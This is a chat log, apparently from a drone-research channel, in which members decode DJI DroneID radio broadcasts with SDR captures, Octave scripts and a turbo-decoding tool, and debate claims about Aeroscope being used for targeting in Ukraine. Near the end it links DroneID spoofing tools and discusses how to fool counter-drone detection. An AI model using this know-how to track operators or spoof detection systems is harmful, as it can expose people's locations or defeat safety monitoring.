[2022-04-19 04:15:31]
hostile :
```
ciajeepdoors@AeroScopeWrecker:~/dji_droneid/cpp$ g++ -Wall remove_turbo.cc -o remove_turbo -I. -I/usr/local/include -L/usr/local/lib -lturbofec
```
[2022-04-19 04:17:34]
hostile :
```
ciajeepdoors@AeroScopeWrecker:~/dji_droneid/cpp$ ./remove_turbo
Usage: ./remove_turbo <input_file>
<input_file> => Path to file containing 7200 ASCII '1' and '0' values
This program will remove the Turbo coding and rate matching found in DJI DroneID signals
and output the decoded frame in hex to the terminal
It has only been tested against the DJI Mini 2
```
[2022-04-19 04:17:43]
hostile :
so can hopefully test tomorrow
[2022-04-19 06:47:35]
atlantic :
and the wonderful thing about the Turbocodes is that if you get a bad constellation like this (I had too much gain when recording), you still get valid decodes.
[2022-04-19 15:09:34]
hostile :
for anyone following along, make sure to both install, and load octave signal via the RC file.
[2022-04-19 15:09:40]
hostile :
```
ciajeepdoors@AeroScopeWrecker:~/dji_droneid$ cd matlab/updated_scripts/
ciajeepdoors@AeroScopeWrecker:~/dji_droneid/matlab/updated_scripts$ octave process_file.m
octave: X11 DISPLAY environment variable not set
octave: disabling GUI features
warning: the 'fir1' function belongs to the signal package from Octave Forge
which you have installed but not loaded. To load the package, run 'pkg
load signal' from the Octave prompt.
Please read <https://www.octave.org/missing.html> to learn how you can
contribute missing functionality.
error: 'fir1' undefined near line 36 column 15
error: called from
process_file at line 36 column 13
ciajeepdoors@AeroScopeWrecker:~/dji_droneid/matlab/updated_scripts$ echo "pkg load signal" >> ~/.octaverc
```
[2022-04-19 15:11:18]
hostile :
In this case my sample file is actually null, but you can see the complaint goes away
[2022-04-19 15:11:21]
hostile :
```
$ octave process_file.m
octave: X11 DISPLAY environment variable not set
octave: disabling GUI features
There are 0 samples in "/tmp/2437MHz_30.72MSPS.fc32"
error: Did not find any bursts
error: called from
assert at line 94 column 11
process_file at line 46 column 1
```
[2022-04-19 15:26:51]
hostile :
Noticing my BladeRF caps in SC16, where as @proto is looking for .fc32 file format. https://nuand.com/libbladeRF-doc/v2.2.1/group___s_t_r_e_a_m_i_n_g___f_o_r_m_a_t.html
[2022-04-19 15:56:40]
shuke :
shuke joined the channel.
[2022-04-19 17:40:06]
atlantic :
[2022-04-19 17:45:53]
jan2642 :
It's indeed crazy slow in Octave. I could see the bursts in SDR++ so I'm pretty sure there's some in the recording but it has been processing for minutes already. And indeed, it uses only a single core...
[2022-04-19 17:54:01]
jan2642 :
Maybe checking for signal strength first before trying to correlate might speed things up ?
[2022-04-19 18:14:11]
jan2642 :
I got tired waiting and used inspectrum to hunt for them and get a smaller file.
[2022-04-19 18:14:14]
jan2642 :
[2022-04-19 18:19:21]
jan2642 :
This matches more or less with the screenshot of baudline on the wiki (The download of baudline doesn't work on my Mac).
I extracted this to a separate file and tried again with Octave but got this error:
```
There are 18432 samples in "../droneid.fc32"
error: abs_scores(18434): out of bound 18432 (dimensions are 18432x1)
error: called from
find_zc_indices_by_file at line 82 column 16
extract_bursts_from_file at line 34 column 13
process_file at line 45 column 8
```
Then I selected some additional data before and after the signal (as in the screenshot) and tried again:
```
There are 21600 samples in "../droneid.fc32"
error: product: nonconformant arguments (op1 is 1x0, op2 is 1x19860)
error: called from
extract_bursts_from_file at line 49 column 23
process_file at line 45 column 8
```
[2022-04-19 18:27:14]
jan2642 :
Ok, made the file about 3 times the size of the data because `read_complex_floats` was called with a negative offset
[2022-04-19 18:33:15]
jan2642 :
Still no luck:
```
warning: Found 597 one(s) in the first symbol which should be all zeros
warning: called from
process_file at line 120 column 9
[ERROR] CRC did not zero out. Got fe6d01 after calculation
```
[2022-04-19 18:36:10]
atlantic :
You've got Ocusync 1 or 3. The all zero symbol is only on Ocusync 2. Apparently the code only does Ocusync 2.
[2022-04-19 18:40:34]
jan2642 :
This was taken with a mavic 2 zoom
[2022-04-19 18:40:38]
atlantic :
note to @proto : easiest is just ignore the first symbol in Ocusync 2
[2022-04-19 18:41:19]
atlantic :
so correlate with ZC and take the two symbols before that.
[2022-04-19 18:42:11]
atlantic :
i can tell from your waterfall that the all zero symbol is not there.
[2022-04-19 18:45:53]
atlantic :
Mavic 2 Zoom has Ocusync 2. So I was wrong, it has nothing to do with Ocusync version. But the first all-zero symbol is missing in your waterfall.
[2022-04-19 18:46:51]
jan2642 :
It still has the firmware it came with: 00.06.0000 Maybe that's the reason ?
[2022-04-19 18:48:16]
atlantic :
I don't know. Can be.
[2022-04-19 18:51:26]
jan2642 :
I'll upgrade it and check again.
[2022-04-19 18:51:48]
atlantic :
or just wait for @proto to change the code
[2022-04-19 18:59:11]
jan2642 :
He's already skipping the first symbol:
[2022-04-19 19:05:43]
atlantic :
% - Adjust for frequency offset based on the offset found using the first OFDM symbol's cyclic prefix
[2022-04-19 19:07:15]
atlantic :
so apparently it is used. i assume some things go wrong when the first symbol is not there, but I did not check the source code in detail. I am pretty sure it fails because your sample does not have this first all-zero symbol.
[2022-04-19 19:22:06]
jan2642 :
ok, I'll wait for him to take a look. Maybe these samples without an all-zero symbol could be useful.
[2022-04-19 21:09:06]
proto :
Oh, that's a good point. Didn't think there would be cases where that all zeros symbol wouldn't exist O.o i was keeping it as a sanity check that things were working properly. i'll just use the crc24 and call it a day
[2022-04-19 21:10:10]
proto :
i'll just change to using the first true data symbol as the coarse freq offset measurement
[2022-04-19 21:29:15]
proto :
does anyone know if the drones that don't send 9 ofdm symbols use a long cyclic prefix on the first symbol they do transmit? my mini 2 sends all 9 symbols, so i don't have a reference :(
[2022-04-19 21:32:46]
jan2642 :
How long is a symbol in us ?
[2022-04-19 21:33:48]
proto :
https://www.sharetechnote.com/html/Handbook_LTE_PhyParameter_DL_FDD.html 5.2us for long 4.69 for short
[2022-04-19 21:39:40]
jan2642 :
Then I would guess it's a short cyclic prefix.
[2022-04-19 21:40:30]
jan2642 :
[2022-04-19 21:41:15]
proto :
that was my hope. prevents having to figure out which kind of drone it is O.o so i can just skip long cyclic prefix + fft size and call it a day :) thank you!
[2022-04-19 21:43:36]
jan2642 :
First symbol. The red rectangle is much closer to 4.69 than 5.2
[2022-04-19 21:44:03]
jan2642 :
It's a mavic 2 but with very old firmware 00.06.00
[2022-04-19 22:21:35]
proto :
the repo has been updated so that it *should* ignore the first symbol. it will still extract the burst as if it were 9 symbols long, but won't use the first symbol for anything (CFO estimation or checking the scrambler)
[2022-04-19 22:22:03]
proto :
now the second symbol (first if you have a drone that only sends 8 symbols) is used for CFO
[2022-04-19 22:28:12]
proto :
hrm, my phase offset is *bad* sometimes
[2022-04-19 22:44:46]
proto :
hopefully the rest of you won't encounter that nastiness. i think it's fixed
[2022-04-19 22:45:05]
proto :
still not amazing, but definitely good enough considering how much parity is in this signal
[2022-04-19 22:45:43]
proto :
the image above is 6 bursts from a collect i made that were demodulated with the `process_file.m` script
[2022-04-20 02:48:10]
proto :
does anyone know if the hopping sequence of drone id is predictable? just from watching some of the individual channels it doesn't look like drone id stays on the same channel for specific amounts of time. someone here posted a picture of the hopping sequence making a sinusoidal shape in a spectrogram, but i haven't noticed that with the mini 2. but, i don't have a wide enough sdr to see all of the channels at once =\
[2022-04-20 02:48:47]
proto :
would be really nice if i could setup gnuradio to hop along with drone id so that there wasn't so much dead time waiting for the channel to become active again
[2022-04-20 04:13:32]
hostile :
for anyone following along, I'm trying to take caps now via UHD using Soapy to talk to the BladeRF so I can get samples in .fc32 format as mentioned earlier today
[2022-04-20 04:13:50]
hostile :
```
ciajeepdoors@AeroScopeWrecker:~/dji_droneid/matlab/updated_scripts$ uhd_rx_cfile --samp-rate 30.72e6 -f 2.422e9 -v /tmp/aaa.fc32 -N $((30720000 * 10))
[INFO] [UHD] linux; GNU C++ version 9.2.1 20200304; Boost_107100; UHD_3.15.0.0-2build5
[INFO] [UHDSoapyDevice] bladerf_open_with_devinfo()
[INFO] [UHDSoapyDevice] bladerf_get_serial() = a0384546e95d4b5388979e6fff88287c
[INFO] [UHDSoapyDevice] setSampleRate(Rx, 0, 4.000000 MHz), actual = 4.000000 MHz
[INFO] [UHDSoapyDevice] setSampleRate(Tx, 0, 4.000000 MHz), actual = 4.000000 MHz
[INFO] [UHDSoapyDevice] setSampleRate(Rx, 0, 30.720000 MHz), actual = 30.720000 MHz
[UHD_RX] Defaulting to mid-point gains:
[UHD_RX] Channel 0 gain: 71.0 dB
[UHD_RX] Motherboard: bladerf2 (a0384546e95d4b5388979e6fff88287c)
[UHD_RX] Daughterboard: Unknown (no serial, RX, 0:0 1:1)
[UHD_RX] Receiving on 1 channels.
[UHD_RX] Rx gain: 71.0
[UHD_RX] Rx frequency: 2422000000.0
[UHD_RX] Rx baseband frequency: 2.422G
[UHD_RX] Rx DDC frequency: -2.0
[UHD_RX] Rx Sample Rate: 30.72M
[UHD_RX] Receiving 307.2M samples.
[UHD_RX] Writing 32-bit complex floats
[UHD_RX] Output file(s): /tmp/aaa.fc32
0000[INFO] [UHDSoapyDevice] bladerf_close()
```
[2022-04-20 04:16:26]
proto :
working on some gnuradio oot modules so this can be done live. prob gonna take a few days
[2022-04-20 04:20:10]
hostile :
```
ciajeepdoors@AeroScopeWrecker:~/dji_droneid/matlab/updated_scripts$ time octave process_file.m
octave: X11 DISPLAY environment variable not set
octave: disabling GUI features
There are 307200000 samples in "/tmp/aaaa.fc32"
```
[2022-04-20 04:20:12]
hostile :
...
[2022-04-20 04:20:23]
hostile :
I'll let ya know how long it takes, and what it says in a bit!
[2022-04-20 04:25:21]
hostile :
lol @proto how well these straight up clone Ettus boards work?
[2022-04-20 04:25:27]
hostile :
[2022-04-20 04:26:08]
hostile :
https://www.ebay.com/itm/174666761789
[2022-04-20 04:26:32]
proto :
i've seen those a lot. the price isn't far off from what you can buy a real b205-mini for
[2022-04-20 04:27:19]
hostile :
aye minus case, and clone parts... gamble to save a few hundo
[2022-04-20 04:27:50]
hostile :
that B200 is a bit more of a deal tho
[2022-04-20 04:28:01]
hostile :
vs https://www.ettus.com/all-products/ub200-kit/
[2022-04-20 04:28:19]
proto :
hmm, well, i got mine from digilentinc.com for ~ $800 but they are out of stock now. so yeah, the price is pretty good, but i don't know anything about the quality of the clones
[2022-04-20 04:28:49]
hostile :
yeah with stock shortages was wondering how they perform
[2022-04-20 04:29:56]
proto :
almost all sdrs with a freq range of 60 MHz to 6 GHz and sample rates up to 64 MSPS (56 usable) are using the ad9361 or ad9364 rf chips
[2022-04-20 04:30:15]
proto :
so if it uses that chip, then it's prob okay. but sdr's are super sensitive to shitty board design
[2022-04-20 04:30:43]
hostile :
aye that was my concern. I figured if someone had tried em we'd have heard one way vs the other. =]
[2022-04-20 04:30:51]
proto :
so for dorking around it's prob fine. but for serious work you're likely to encounter issues if the boards aren't all that great
[2022-04-20 04:31:00]
hostile :
I'm set for now with the Blade & HackRF, but folks always looking for options.
[2022-04-20 04:31:55]
hostile :
need the cheapest options so we can have a DroneID trader website. We all spool em up, let em sit, and start collecting historic data on flights lol
[2022-04-20 04:32:40]
proto :
ahhhh yeah, gonna need something on the higher end =\ no rtlsdr for this
[2022-04-20 04:33:08]
hostile :
[2022-04-20 04:33:37]
proto :
btw, the chances are that the collect you have doesn't have any drone id. one second of data is almost certainly not going to happen to end up hearing a drone id burst seeing as how they hop around a lot. you're prob better off looking at the samples in baudline before running the octave script that takes for facking ever
[2022-04-20 04:33:45]
proto :
this issue will be solved with the gnuradio blocks
[2022-04-20 04:34:11]
proto :
gnuradio will look at the samples in real time and extract just the bursts
[2022-04-20 04:34:17]
hostile :
yeah wasn't expecting much on the first stab at it. Just wanted to get something capped before I slept.
[2022-04-20 04:35:09]
hostile :
at this point most interested in how long it takes this slow ass laptop to chew through that capture as is, at face value.
[2022-04-20 04:35:19]
hostile :
debate on if I wanna pay for a matlab license or not
[2022-04-20 04:35:45]
proto :
i wouldn't for this. gnuradio will make the matlab obsolete. matlab and octave are for prototyping.
[2022-04-20 04:36:29]
proto :
if the signal changes, then matlab/octave are useful for trying to find out what changed as gnuradio is a shit show for debugging signals
[2022-04-20 04:36:37]
hostile :
I had one for other shit a while back. Probably just looking for an excuse at this point.
[2022-04-20 04:36:52]
hostile :
bed for now! I'll post the timing on that cap when I wake up.
[2022-04-20 04:41:26]
hostile :
welp it shit the bed lol
[2022-04-20 04:41:29]
hostile :
```
There are 307200000 samples in "/tmp/2437MHz_30.72MSPS.fc32"
error: out of memory or dimension too large for Octave's index type
error: called from
extract_bursts_from_file at line 41 column 12
process_file at line 43 column 8
real 21m8.216s
user 20m49.641s
sys 0m16.252s
```
[2022-04-20 04:41:32]
hostile :
need more ram!
[2022-04-20 04:42:24]
proto :
you can drop the number of samples that it reads in at a time and that might help https://github.com/proto17/dji_droneid/blob/main/matlab/updated_scripts/process_file.m#L35
[2022-04-20 04:43:04]
proto :
but it does still have to store 30.72e6 * 4 bytes of correlation data though that shouldn't kill a laptop
[2022-04-20 04:43:31]
proto :
that or there is a bug O.O
[2022-04-20 04:45:03]
icer :
You getting overruns?
[2022-04-20 04:45:41]
icer :
I’m waiting for what comes after the ad936X line
[2022-04-20 04:46:21]
proto :
seems that we have the adrv9009 and xilinx (amd) rfsoc line
[2022-04-20 04:46:38]
proto :
adrv9009 being the successor to the ad936x family imo
[2022-04-20 04:46:45]
proto :
lots more bandwidth
[2022-04-20 04:48:25]
icer :
[2022-04-20 04:48:49]
icer :
How much more?
[2022-04-20 04:49:30]
icer :
200mhz IBW
[2022-04-20 04:49:39]
icer :
4 X the old chip
[2022-04-20 04:50:10]
proto :
the rfsoc's can view ghz at a time, but can't actually process that much data. the adrv9009 i *think* can do > 200 MHz on multiple channels
[2022-04-20 04:50:18]
proto :
with an observation port that goes higher
[2022-04-20 04:51:03]
proto :
https://www.analog.com/en/products/adrv9009.html 200 MHz max for the normal rx chain, 450 mhz observation port
[2022-04-20 04:51:40]
proto :
the new ettus x410 uses an rfsoc from xilinx (amd) https://www.ettus.com/all-products/usrp-x410/
[2022-04-20 04:52:04]
icer :
Oh wow, Epiq is already shipping it
[2022-04-20 04:52:07]
icer :
https://epiqsolutions.com/rf-transceiver/sidekiq-x4/
[2022-04-20 04:52:39]
proto :
oh epiq. i wish i could get my hands on some of the x4's. we have the z2's and are hopefully going to get some z3's soon
[2022-04-20 04:53:17]
icer :
25k
[2022-04-20 04:53:27]
icer :
I have some z2
[2022-04-20 04:53:30]
proto :
yeah, facking expensive O.o
[2022-04-20 04:53:37]
proto :
the sdk for epiq is crazy expensive
[2022-04-20 04:54:34]
icer :
Yeah
[2022-04-20 04:54:34]
proto :
up to 5gsps adcs :drooling_face:
[2022-04-20 04:54:42]
icer :
But I really want a phone with one in it
[2022-04-20 04:55:00]
proto :
that would be pretty cool for sure
[2022-04-20 04:55:23]
icer :
When I bought my equip ask it was a laptop and two pci receivers for 30k
[2022-04-20 04:55:27]
proto :
this little guy is pretty close to phone form factor https://epiqsolutions.com/rf-transceiver/matchstiq-z/
[2022-04-20 04:55:48]
proto :
jeebus that's a lot of $$
[2022-04-20 04:56:35]
icer :
[2022-04-20 05:01:16]
jan2642 :
Still no luck:
[2022-04-20 05:01:22]
icer :
I’d love to have a m.2 or nvme connected SDR. Usb is buggy
[2022-04-20 05:01:47]
icer :
What y’all trying to do
[2022-04-20 05:03:23]
proto :
well that's just goofy. are you sure the signal is centered? do you know how to plot the time domain? something like `figure(1); plot(10 * log10(abs(burst).^2))`
[2022-04-20 05:03:29]
jan2642 :
It errors out almost immediately because of CRC errors. It finds over 300 bursts in a file which has only one. If I let it iterate over all of them, ignoring the CRC error, there's one burst where I see almost clean QPSK constellations
[2022-04-20 05:04:01]
proto :
that's *really* strange
[2022-04-20 05:04:39]
proto :
the bursts are detected by correlating for the zc sequence which shouldn't just randomly happen O.o are you using octave or matlab?
[2022-04-20 05:04:51]
jan2642 :
Might be an octave compatibility thing.
[2022-04-20 05:05:08]
proto :
i'd be interested in seeing an output of baudline if you are running on a linux system
[2022-04-20 05:05:19]
jan2642 :
GNU Octave, version 6.4.0
[2022-04-20 05:05:34]
jan2642 :
It's a Mac.
[2022-04-20 05:05:42]
proto :
hmm, i'm using 5.2.0 (thanks ubuntu)
[2022-04-20 05:06:03]
proto :
but the strange part is that you have what looks like a good zc in symbol 4
[2022-04-20 05:06:03]
jan2642 :
I'll try to record some bursts today that I can share (not at my house ;-) )
[2022-04-20 05:06:10]
proto :
no energy in the first three symbols tho
[2022-04-20 05:06:54]
proto :
then you have energy after the zc
[2022-04-20 05:07:34]
proto :
i really wish coordinates weren't in the facking things so we could share files without issues :(
[2022-04-20 05:07:43]
proto :
of course, then i prob wouldn't be doing this lol
[2022-04-20 05:11:00]
icer :
That’s weird
[2022-04-20 05:14:57]
icer :
Are you bucketing with FFT size?
[2022-04-20 05:20:03]
proto :
i use a fir filter with the coefficients being the conjugate of the zc sequence https://github.com/proto17/dji_droneid/blob/main/matlab/updated_scripts/find_zc_indices_by_file.m#L19
[2022-04-20 05:20:35]
proto :
and maintain the filter state between chunks being read in from disk (to help those without huge amounts of avail ram) https://github.com/proto17/dji_droneid/blob/main/matlab/updated_scripts/find_zc_indices_by_file.m#L52
[2022-04-20 05:22:30]
proto :
@jan2642 apologies for having to leave you hanging, but i need to go to sleep. it's crazy late here :( i'll think about what can be done to help debug your signal. in the mean time, would you mind checking that the signal you recorded is centered and that you set the correct config lines https://github.com/proto17/dji_droneid/blob/main/matlab/updated_scripts/process_file.m#L30-L32
[2022-04-20 05:24:16]
proto :
mainly make sure the sample rate is correct, and that if you did record the signal off center to remove the dc spike that you set the correct `file_freq_offset`. if either of those are incorrect then the demod will 100% fail. the issue of you not seeming to have energy before the ZC is super curious. what drone is that?
[2022-04-20 05:24:42]
proto :
oh, and the latest code in the repo saves off all constellation plots to a folder called `images`
[2022-04-20 05:25:02]
proto :
so you should be able to see exactly how many bursts were found and which ones had valid constellations
[2022-04-20 05:25:14]
proto :
anywho, i'm out. later all!
[2022-04-20 05:54:22]
atlantic :
[2022-04-20 05:58:22]
atlantic :
that is because you use symbol 4 for channel estimation, ( ZC / garbage ) * same garbage = ZC
[2022-04-20 09:06:07]
tmbinc :
@proto the hopping is the uplink, not droneid. If you look at the PNG, you can see that droneid is at a constant frequency.
[2022-04-20 09:07:42]
tmbinc :
I am in the middle of understanding the code that generates the hopping sequence (from the S1 firmware), there are a few components (including a goldseq with 0x12345678 - definitely unrelated to the packet scrambling, so highly suspicious usage) and look up tables
[2022-04-20 09:08:03]
tmbinc :
I can also parse the logs that the firmware produces to some extent and see the hopping there
[2022-04-20 09:08:29]
tmbinc :
But I haven't been able to connect all the dots together yet...
[2022-04-20 09:08:36]
tmbinc :
But again - this only affects the uplink, not droneid
[2022-04-20 10:27:30]
jan2642 :
@proto the length of indices was way too high for just one burst so I've been increasing `correlation_threshold` to lower it. Even at 0.999 it still had over 200 items so I went over 1 and still got a lot. At 10 I only got 2, at 15 there was only 1 and the decoding worked !
[2022-04-20 10:28:15]
jan2642 :
Not as clean as your recording ;-)
[2022-04-20 21:42:07]
wavesahead :
wavesahead joined the channel.
[2022-04-20 21:43:42]
wavesahead :
hi
[2022-04-20 22:05:40]
wavesahead :
saw the ettus clones message scrolling up... they aren't clones, just factory rejects. the parts are not qa'd and you also gamble with the possibility of getting an ewaste unit repaired or sold as is. tons of gear out of china like that, ebay is the amazon of aliexpress and taobao goods for those.
[2022-04-20 22:10:02]
wavesahead :
i take it you guys dont have a tx component yet, right?
[2022-04-20 22:19:52]
czokie :
A quick confirmation that Russia is using Aeroscope directly linked to their targeting. Multiple reports of precision targeting, so this guy did a test - Setup a camera at landing spot, and then moved away. Moments later, incoming fire. https://www.youtube.com/watch?v=ynmmwCEWEsE
[2022-04-20 22:21:19]
czokie :
The guy that shot this video will be on live in the near future on https://www.youtube.com/kenheron/live to talk about the "receiving" end of this russian fun. But the video will be shared there tomorrow.
[2022-04-20 22:23:36]
wavesahead :
it is widely confirmed that kadyrovtsy are using aeroscope and other units in the dpr since the beginning.
[2022-04-20 22:24:08]
czokie :
True - but just seeing the "impact" of that kinda brings it home a little.
[2022-04-20 22:24:25]
wavesahead :
the most useful information comes out in the native telegram groups
[2022-04-20 22:25:15]
wavesahead :
i also have access to a few russian groups that are not publicly listed with satcom stuff and some aeroscope footage trickled there
[2022-04-20 22:25:30]
wavesahead :
so, it is a fact.
[2022-04-20 22:27:26]
wavesahead :
Aerorozvidka moved away from cots drones and they use their own designs with mortar shell payloads using 3d printed stabilizers
[2022-04-20 22:29:24]
wavesahead :
[2022-04-20 22:29:39]
wavesahead :
some recent dji sighting in azovstal
[2022-04-20 22:29:50]
wavesahead :
[2022-04-20 23:03:17]
czokie :
I’ve just been debunked. Misinformation. Disregard
[2022-04-20 23:04:21]
hostile :
https://dji-rev.com/dji-rev/pl/hb8ihrtw8pdp5cqxweqhs6qnra not for Occusync. Only Wifi.
[2022-04-20 23:05:08]
hostile :
I pushed for more accurate info on that specific topic @czokie https://twitter.com/d0tslash/status/1502329015910207492
[2022-04-20 23:05:38]
czokie :
Trust hostile to have every post under the sun on the topic
[2022-04-20 23:06:36]
hostile :
https://twitter.com/adamlisberg/status/1501994676018200583
[2022-04-20 23:06:47]
hostile :
and be directly involved in trying to get good info out. ;)
[2022-04-20 23:09:02]
hostile :
https://twitter.com/d0tslash/status/1507601552416161792?s=20&t=o0fyCWQLec6fMRqbkjRB_Q
[2022-04-20 23:09:24]
hostile :
https://twitter.com/d0tslash/status/1507599398385168385?s=20&t=o0fyCWQLec6fMRqbkjRB_Q
[2022-04-20 23:56:54]
czokie :
For the benefit of others, I had received the above video forwarded to me - with someone claiming to have been present at the time of this "test". Hostile - you're the "snopes" of the drone world. Thanks for that.
[2022-04-21 00:04:37]
hostile :
I'm back bitches! lol
[2022-04-21 00:07:13]
hostile :
now just the same. I do want to point out that I'm not at all downplaying the fact that it is trivial to use CUAS coordinates to augment firing of artillery. Both DJI droneID, and other EW, CUAS platforms have the exact same capability with regard to the ability to ruin someone's OPSEC via signal propagation & subsequent analysis. The video above does indeed adequately represent the threat, my only beef with the representation is that it is a *confirmed* strike due to Aeroscope being integrated with a weapons platform. There is nothing in the video that makes such confirmations. Risk visualization, yup 100% clear as day, message received.
[2022-04-21 01:58:49]
hostile :
small FYI for anyone trying to use Octave with @proto 's example code. Mind the versions as newer versions can't use the signal library https://octave.discourse.group/t/eliminating-use-of-error-state-in-octave-code/1515
[2022-04-21 01:59:33]
hostile :
resulting in shit like this:
[2022-04-21 02:01:39]
hostile :
@wavesahead IMHO... post it here. You can't just say 'some aeroscope footage trickled there... so, it is a fact.' https://dji-rev.com/dji-rev/pl/kcqacau3o3g89b5znmqermdyic
[2022-04-21 02:04:27]
hostile :
To my knowledge there has not been a publicly posted video confirming the claim of direct integration of Aeroscope with Artillery. And until there is, it is hard to verify the claim. Sure some units have portable aeroscopes. In theory a number of CUAS platforms have been able to decode droneID packets for years now. You don't even need an aeroscope at all. It is easy to make the correlation and point to causations and such. But I still maintain until someone posts concrete evidences *here* we should not make similar claims.
[2022-04-21 02:08:44]
hostile :
These claims have been relayed on via folks first hand in the situation none the less. Example here: https://dji-rev.com/dji-rev/pl/eosf66o4spfrmknn84yn3js8wh
[2022-04-21 02:10:23]
hostile :
I'll maintain many old crows, EW folks, and CUAS platforms are completely capable of detecting, demodulating and extracting GPS coordinates from DroneID, never mind lightbridge (and likely Occusync) to the point of DUML location packets. https://dronecenter.bard.edu/files/2019/12/CSD-CUAS-2nd-Edition-Web.pdf
[2022-04-21 02:11:03]
hostile :
so fingering AeroScope exclusively in this problem IMHO is a red herring, and to this point an unverified claim.
[2022-04-21 02:13:11]
hostile :
Fingering DJI piss poor protocol decisions (droneID / RemoteID implementation), and open denial of known exploitable protocol vulnerabilities (lightbridge at the very least) is something I can however get completely down with. But please note these are two separate *problems* so to speak. 1) the mere fact that location data can be extracted either from a hacked link, or from broadcasts and 2) the privacy issues associated with both those facts.
[2022-04-21 02:15:52]
hostile :
the mere fact that the Enhanced Wifi drones use WEP is a bigger issue for example to me than the fact that they have droneID enabled by default. Both... can get someone killed in context.
[2022-04-21 05:33:30]
areoc :
areoc joined the channel.
[2022-04-21 10:52:41]
wavesahead :
definitely not an aeroscope only situation. and very likely that to some degree EW capabilities in more modern systems have some form of drone detection. however this is also dubious. have you seen the actual platforms they are using?
[2022-04-21 10:58:59]
wavesahead :
except for direction finding and the like, it does not seem they have anything that involves detection or drones doing demod and packet processing. ill see what i can do about getting some more information.
[2022-04-21 11:09:30]
dkovar :
Numerous U.S. CUAS firms have the ability to fingerprint and track various commercial/consumer drones via RF methods. Dedrone is just one example. The DOD and USG use some of these commercial solutions as well as DOD funded/supported solutions.
I think it is reasonable to assume that Russia either developed or acquired similar capabilities, particularly since they've been fighting Ukraine since 2015 and Ukraine has been using drones since then as well.
Information about CUAS systems deployed in Ukraine as well as their capabilities and their effectiveness is very hard to come by, for obvious reasons.
[2022-04-21 11:41:55]
mrbou :
@mrbou left the channel.
[2022-04-21 15:35:14]
hostile :
@jan2642 did you ever take those Mavic Air tcpdumps to get to @dragorn by chance? https://dji-rev.com/dji-rev/pl/pwdedzasg3gejgggjromjfdb4e
[2022-04-21 15:56:28]
jan2642 :
@hostile Yes I did but I didn't share them in the channel because they contain my position. The MP1 capture I still need to make.
[2022-04-21 15:56:54]
hostile :
cool just wanted to make sure @dragorn got em! Trying to do my cat wrangling responsibilities. =]
[2022-04-21 16:06:09]
dragorn :
:thumbsup: we good!
[2022-04-21 16:06:35]
dragorn :
i mean, kinda. they report bogus v2 content in the old caps too. so, "awesome".
[2022-04-21 16:06:40]
dragorn :
fuzzy logic time
[2022-04-21 16:55:24]
wavesahead :
heya
[2022-04-21 17:15:22]
hostile :
it is pretty asynchronous in here @wavesahead. Small bursts of tech info seem to flow by every few days. No one seems *constantly* active though.
[2022-04-21 17:23:09]
wavesahead :
yeah that is fine
[2022-04-21 17:23:23]
wavesahead :
im lacking an actual aeroscope unit to test eventually, but atm it isnt really needed
[2022-04-21 17:31:02]
wavesahead :
what is the actual status of drone id and similar protocols, in terms of code to demod + protocol specs/descriptions?
[2022-04-21 17:31:46]
wavesahead :
and is there any open source project already offering detection functionality that could be used to test spoofing techniques in lieu of access to the commercial offerings?
[2022-04-21 17:32:51]
wavesahead :
in my opinion commercial offerings often, by nature of being opaque platforms, tend to be easy to fool, as the developers are just employees who get paid and go home, and quite honestly few companies invest in R&D to break their own products, regardless of what they say
[2022-04-21 17:47:40]
wavesahead :
@dragorn maybe you know.
[2022-04-21 17:47:56]
wavesahead :
anything that saves me time from reading through months of chat backlogs will be much appreciated
[2022-04-21 18:24:36]
hostile :
Both Occusync and EnhancedWifi protocol DroneID broadcasts are understood. They are transmitted in parallel to the actual c2 link. The only open source tools to receive are kismet, and the repo above by @Proto that's it. My paper on it from 2017 is the gold standard. https://approveddronepilots.co.uk/wp-content/uploads/2018/05/Anatomy-of-DJI-Drone-ID-Implementation1.pdf
[2022-04-21 18:25:01]
hostile :
OGs here helped with the writeup, and @dragorn with the implementation for wifi+kismet
[2022-04-21 18:25:10]
hostile :
kismet droneid
[2022-04-21 18:25:20]
hostile :
https://www.kismetwireless.net/development/droneid/
[2022-04-21 18:25:31]
hostile :
https://github.com/kismetwireless/kismet/blob/master/kaitai_definitions_disabled/dot11_ie_221_dji_droneid.ksy
[2022-04-21 18:26:12]
hostile :
only other known used protocol is the EU opendroneid format. https://github.com/opendroneid
[2022-04-21 18:26:43]
wavesahead :
nice, checking
[2022-04-21 18:26:56]
hostile :
these examples still valid today on v1 droneid packets which aeroscope MUST support still. https://github.com/DJISDKUser/ESP8266_DJI_DroneID_Throwie
[2022-04-21 18:27:03]
hostile :
https://github.com/DJISDKUser/metasploit-framework/tree/DJIDroneIDSpoof
[2022-04-21 18:27:39]
wavesahead :
there is absolutely no synchronicity between the broadcasts and the c2 as far as detection is involved, correct? of course a sophisticated detection platform would try to verify both but that might be tricky
[2022-04-21 18:27:50]
hostile :
you are correct.
[2022-04-21 18:28:12]
hostile :
and Aeroscope is not at all sophisticated
[2022-04-21 18:28:27]
wavesahead :
as far as i can see, the only way to correlate the channels would be by obvious ID fields matching in both and then you would depend on checking positional telemetry?
[2022-04-21 18:28:33]
hostile :
it for example accepts the 5mhz wifi droneid packets at 20mhz with no fucks (probably cuz in some countries it must support that fallback)
[2022-04-21 18:29:16]
hostile :
I'm not gonna spitball ways to make folks CUAS better here. ;)
[2022-04-21 18:29:21]
wavesahead :
indeed
[2022-04-21 18:29:31]
wavesahead :
i have zero interest in helping them
[2022-04-21 18:29:34]
wavesahead :
so, moving on to private
[2022-04-21 18:30:54]
hostile :
see this PR re: how to use my prior work
[2022-04-21 18:30:56]
hostile :
https://github.com/rapid7/metasploit-framework/pull/9301
[2022-04-21 18:31:12]
hostile :
lorcon restrictions on licensing prevented it from being merged into metasploit proper
[2022-04-21 18:37:38]
dragorn :
sorry, juggling a busy work day and being in a browser this doesn't notify me when I get tagged...
[2022-04-21 18:38:24]
dragorn :
Kismet handles the wifi stuff, you may need a special card tho to get 5mhz if a RC controller is involved
[2022-04-21 18:39:03]
dragorn :
@proto has been working on some RF stuff, and I'm happy to integrate that into kismet once it's at a state where that's feasible; the problem is I have no RF-capable drones myself so i can't really thrash on testing to get it there
[2022-04-21 18:39:42]
dragorn :
Right now kismet handles the "new" format of the protocol, too, but because dji is dji, it seems like it's not correctly identified, so it's going to require some fuzzy logic to see if the coordinates are garbage or not
[2022-04-21 18:40:36]
dragorn :
https://github.com/kismetwireless/kismet/blob/master/dot11_parsers/dot11_ie_221_dji_droneid.cc#L45
[2022-04-21 18:41:06]
dragorn :
'v1' is the 'old' format, and 'v2' is the 'new' - except that's wrong, because they all advertise '2' in the format field, AND appear to all be the same length, so either I've never seen a true V2, or DJI is busted AF again.
